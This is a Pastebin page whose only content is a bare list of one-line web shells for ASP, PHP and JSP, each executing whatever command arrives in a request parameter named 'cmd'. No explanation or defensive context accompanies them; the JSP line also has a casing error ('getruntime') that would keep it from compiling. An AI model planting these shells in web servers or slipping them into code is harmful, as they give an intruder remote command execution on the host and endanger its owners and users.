Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ASP <% eval request("cmd") %>
- PHP <?php system($_GET["cmd"]) ?>
- JSP <% Runtime.getruntime().exec(request.getParameter("cmd")) %>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement